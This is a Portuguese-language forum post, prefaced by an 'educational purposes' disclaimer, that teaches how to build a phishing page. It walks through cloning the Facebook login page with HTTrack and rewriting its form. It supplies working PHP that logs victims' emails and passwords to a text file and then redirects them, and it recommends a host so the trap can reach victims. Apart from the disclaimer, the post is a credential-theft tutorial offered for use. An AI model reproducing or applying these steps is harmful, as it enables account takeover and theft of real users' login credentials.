Aviso Legal Este Fórum foi publicado com propósitos educacionais para ensinar às pessoas como os malfeitores podem rastreá-las ou monitorá-las ou obter informações de suas credenciais, não somos responsáveis pelo uso ou pelo escopo que possa ter as pessoas através deste projeto. Estamos totalmente convencidos de que, se ensinarmos como as coisas são vulneráveis, podemos tornar a Internet um lugar mais seguro.
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
ESTE MATERIAL FOI CAPTADO VIA BOT'S E NÃO SABEMOS SUA REAL ORIGEM E VERACIDADE!
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
ESTE MATERIAL FOI CAPTADO VIA BOT'S E NÃO SABEMOS SUA REAL ORIGEM E VERACIDADE!
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- Código:
Como criar uma página fake
Hoje iremos aprender a criar uma página fake. Mas o que é uma página fake? Página fake é uma pagina falsa! Hã?!... Bem, para você que ainda não entendeu, pagina fake é um clone de uma página de outro site, na maioria das vezes são clones de areas de login de redes sociais; aqui está uma imagem exemplificando/explicando o que é uma pagina fake (ou falsa):
Fonte: http://www.blogtimicrocamp.com.br/artigos/paginas-fakes/
Você conseguiu entender? Caso não veja mais sobre esse assunto, conhecido também como phishing, aqui. Então vamos lá. Primeiro de tudo você precisa ter um servidor PHP rodando
em um VPS ou em seu computador. Ou melhor, aqui está uma lista dos programas que você irá precisar antes de começar a fazer sua própria página fake:
Servidor PHP: Xampp ou WampServer
Clonador de sites: HTTrack
Editor de texto: Notepad++
Navegador atualizado: Chrome (Recomendado)
Você também precisa de algum conhecimento básico em HTML e PHP, mas,
caso não tenha, não se preocupe, há ótimos cursos sobre essas linguagens
pela internet a fora; os mais completos são esses aqui: HTML/PHP.
Depois desses pré-requitos resolvidos, é hora de por a mão na massa.
Vamos começar abrindo o HTTrack e clicando, logo, em "Avançar >".
Na próxima janela dê um nome ao seu projeto e então clique em "Avançar >".
Na outra, coloque o endereço da página de login da rede social que você quer 'hackear'/descobrir a senha.
Como nesse tutorial eu vou usar, como exemplo, o Facebook, irei colocar o seguinte endereço: http://www.facebook.com/login/, só lembrando que nem sempre as outras rede sociais seguem o mesmo padrão para a página de login.
E depois clique em "Avançar >" e logo após em concluir.
Depois do término da clonação da página, é hora de começar a programação. Vamos criar dois arquivos: usuarios.txt e login.php, você pode fazer isso pelo próprio Notepad++, que vamos usar agora para editar o arquivo 'login.php', nesse arquivo coloque o seguinte código e salve-o:
<?php
header('location:http://facebook.com.br/');
$users = fopen("usuarios.txt","a+");
$u = $_GET['u'];
$p = $_GET['p'];
fwrite($users,"
-------------------------------\n
Usuário/Email: $u\n
Senha: $p \n
-------------------------------\n
")
?>
Agora vamos abrir a página .html que você clonou pelo HTTrack, que provavelmente está em C:\Meus Sites\NOME_DO_SEU_PROJETO. Abra ela pelo Notepad++ e encontre a parte do código que corresponde ao formulário de login, substitua a tag:
<form action= ...>
Lembrando que ela pode variar em seu formato, pela seguinte tag:
<form method="get" action="login.php" name="logon">
Depois de substituir a tag, renomeie os inputs correspondentes aos campos de email e de senha para 'u' e 'p', sem as aspas, respectivamente.
Após todos estes passos acima, é só pegar os arquivos criados nesse tutorial e joga-los ao servidor. Só lembrando que para que a página fake ser acessível pela vítima, você tem que hospedar os arquivos em servidores com php, eu recomendaria a vocês a(o) Hostinger. Quando alguém cair nessa sua "armadilha", o email e a senha da vítima estará disponível no arquivo 'usuarios.txt'. Até próximo post! : )